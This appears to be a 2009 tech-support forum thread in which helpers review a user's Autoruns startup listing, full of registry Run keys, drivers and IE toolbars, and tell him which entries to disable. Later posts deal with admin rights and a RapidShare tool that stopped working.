Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Classes\Folder\Shellex\ColumnHandlers
Entry name:
Haali Column Provider
Program path & name:
c:\program files\haali\matroskasplitter\mmfinfo.dll"
Enabled: [V]


Program:
"PDF Shell Extension"
Publisher:
"(Not verified) Adobe Systems Inc."
Entry path:
HKLM\Software\Classes\Folder\Shellex\ColumnHandlers
Entry name:
PDF Shell Extension
Program path & name:
"c:\program files\common files\adobe\acrobat\activex\pdfshell.dll"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Toolbar
Entry name:
googletoolbar1.dll
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
"ToolBand Module"
Publisher:
"(Verified) DAEMON Tools Code Signing Services"
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Toolbar
Entry name:
dttoolbar.dll
Program path & name:
"c:\program files\daemon tools toolbar\dttoolbar.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Extensions
Entry name:
Sky
Program path & name:
File not found: http://www.sky.com"
Enabled: [V]



For your information, I use Firefox. Internet Explorer sucks and I never ever used it on this PC. In fact, I installed Firefox from a USB, before you say how did you get Firefox then.

Also, a notification came up before that never has before, saying that AVG Internet Security is off while Windows Internet Security is on.

dox online
12-05-09, 07:10
I wasn't typing anything in? What are you on about? I was merely saying that I have had experience with mIRC viruses, being a mIRC user for a very long time.
I was talking about pneboy, sorry for the confusion.

EscondeR
12-05-09, 09:59
Download and run Autoruns (http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx) and kill those entries:


Program:
"IP in IP Tunnel Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
IpInIp
Program path & name:
File not found: system32\DRIVERS\ipinip.sys"
Enabled: [V]


Program:
"IPX Traffic Filter Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFlt
Program path & name:
File not found: system32\DRIVERS\nwlnkflt.sys"
Enabled: [V]


Program:
"IPX Traffic Forwarder Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFwd
Program path & name:
File not found: system32\DRIVERS\nwlnkfwd.sys"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
CtrlVol
Program path & name:
File not found: C:\Program Files\Launch Manager\CtrlVol.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
LaunchAp
Program path & name:
File not found: C:\Program Files\Launch Manager\LaunchAp.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Wbutton
Program path & name:
File not found: C:\Program Files\Launch Manager\WButton.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NPCTray
Program path & name:
File not found: C:\Program Files\Norman\npc\bin\npc_tray.exe"
Enabled: [V]


Program:
" "
Publisher:
"(Not verified) "
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google EULA Launcher
Program path & name:
"c:\program files\google\google eula\googleeulalauncher.exe"
Enabled: [V]


Program:
"Java(TM) Platform SE binary"
Publisher:
"(Verified) Sun Microsystems Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
SunJavaUpdateSched
Program path & name:
"c:\program files\java\jre1.6.0_07\bin\jusched.exe"
Enabled: [V]


Program:
"QuickTime Task"
Publisher:
"(Not verified) Apple Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
QuickTime Task
Program path & name:
"c:\program files\quicktime\qttask.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NBKeyScan
Program path & name:
File not found: C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
Enabled: [V]


Program:
"recovery information"
Publisher:
"(Not verified) fsc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
recinfo
Program path & name:
"c:\recinfo\recinfo.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google Update
Program path & name:
"c:\users\user\appdata\local\google\update\googleupdate.exe"
Enabled: [V]


Program:
"RapidShare Free Account Notifier"
Publisher:
"(Not verified) CMS"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
CMS_RSChecker
Program path & name:
"c:\users\user\desktop\rsfan\rsfan\rsfan.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
Task Scheduler
Entry name:
GoogleUpdateTaskUserS-1-5-21-4090995505-84853843-37879430-1000.job
Program path & name:
"c:\users\user\appdata\local\google\update\googleupdate.exe"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Entry name:
Google Toolbar Helper
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Toolbar
Entry name:
googletoolbar1.dll
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Extensions
Entry name:
Sky
Program path & name:
File not found: http://www.sky.com"
Enabled: [V]

pneboy
12-05-09, 12:05
Download and run Autoruns (http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx) and kill those entries:


Program:
"IP in IP Tunnel Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
IpInIp
Program path & name:
File not found: system32\DRIVERS\ipinip.sys"
Enabled: [V]


Program:
"IPX Traffic Filter Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFlt
Program path & name:
File not found: system32\DRIVERS\nwlnkflt.sys"
Enabled: [V]


Program:
"IPX Traffic Forwarder Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFwd
Program path & name:
File not found: system32\DRIVERS\nwlnkfwd.sys"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
CtrlVol
Program path & name:
File not found: C:\Program Files\Launch Manager\CtrlVol.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
LaunchAp
Program path & name:
File not found: C:\Program Files\Launch Manager\LaunchAp.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Wbutton
Program path & name:
File not found: C:\Program Files\Launch Manager\WButton.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NPCTray
Program path & name:
File not found: C:\Program Files\Norman\npc\bin\npc_tray.exe"
Enabled: [V]


Program:
" "
Publisher:
"(Not verified) "
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google EULA Launcher
Program path & name:
"c:\program files\google\google eula\googleeulalauncher.exe"
Enabled: [V]


Program:
"Java(TM) Platform SE binary"
Publisher:
"(Verified) Sun Microsystems Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
SunJavaUpdateSched
Program path & name:
"c:\program files\java\jre1.6.0_07\bin\jusched.exe"
Enabled: [V]


Program:
"QuickTime Task"
Publisher:
"(Not verified) Apple Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
QuickTime Task
Program path & name:
"c:\program files\quicktime\qttask.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NBKeyScan
Program path & name:
File not found: C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
Enabled: [V]


Program:
"recovery information"
Publisher:
"(Not verified) fsc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
recinfo
Program path & name:
"c:\recinfo\recinfo.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google Update
Program path & name:
"c:\users\user\appdata\local\google\update\googleupdate.exe"
Enabled: [V]


Program:
"RapidShare Free Account Notifier"
Publisher:
"(Not verified) CMS"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
CMS_RSChecker
Program path & name:
"c:\users\user\desktop\rsfan\rsfan\rsfan.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
Task Scheduler
Entry name:
GoogleUpdateTaskUserS-1-5-21-4090995505-84853843-37879430-1000.job
Program path & name:
"c:\users\user\appdata\local\google\update\googleupdate.exe"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Entry name:
Google Toolbar Helper
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Toolbar
Entry name:
googletoolbar1.dll
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Internet Explorer\Extensions
Entry name:
Sky
Program path & name:
File not found: http://www.sky.com"
Enabled: [V]


would you be able to give a brief explanation of what these do? because when i had a problem playing tombraider on my pc last year i was told to kill a process and it cut off my internet until i rebooted

dox online
12-05-09, 14:34
would you be able to give a brief explanation of what these do? because when i had a problem playing tombraider on my pc last year i was told to kill a process and it cut off my internet until i rebooted
Find each entry in autoruns and untick the entries that match up with the ones posted.

pneboy
12-05-09, 16:51
the computer is complaining i'm not admin, but i know i am

EscondeR
12-05-09, 18:28
^ CLICKY (http://www.tombraiderwiki.com/index.php/Administrator) :)

pneboy
12-05-09, 20:12
done that, what should happen and how do i hide the admin again? damn vista lying to me, making me think i am ruler of this computer

spikejones
12-05-09, 22:19
when you enable the administrator account, reboot into it!
as a side note, there is an option on the autoruns "file" menu that you can select after starting it, in order to "run as administrator" ;)

pneboy
13-05-09, 17:26
i think stopping those things did something to my pc, now my rapidshare software won't work. not the checker, it's called "rapidshare auto downloader". i really need to use it

EscondeR
13-05-09, 17:34
You can reenable this entry, IF you really need it:

Program:
"RapidShare Free Account Notifier"
Publisher:
"(Not verified) CMS"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
CMS_RSChecker
Program path & name:
"c:\users\user\desktop\rsfan\rsfan\rsfan.exe"
Enabled: [V]

Actually, using those free tools by different file shares (downloaders, notifiers, etc.) is highly unsafe, therefore I always recommend not using them. 70% of this stuff is pure spy/adware.

pneboy
13-05-09, 17:39
that's not the same program, it's a different thing that notifies me of free accounts. the program i need to work is a downloader, all it does is download the files automatically because i get side tracked

edit: just tried to get on rapidshare.com and it's coming up with
HTTP 500 - Internal Server Error

but this site reports it's still up
http://downforeveryoneorjustme.com/

spikejones
13-05-09, 20:05
I'd say to clear your cache and cookies and try again; perhaps your connection with Rapidshare has been altered in some manner by the rapidshare free account notifier service, but generally a 500 error is server-side specific only: http://www.checkupdown.com/status/E500.html

As per your services, there is only ONE in your log related to rapidshare (and as such only ONE you have altered the status of). That one would be the free account notifier mentioned above.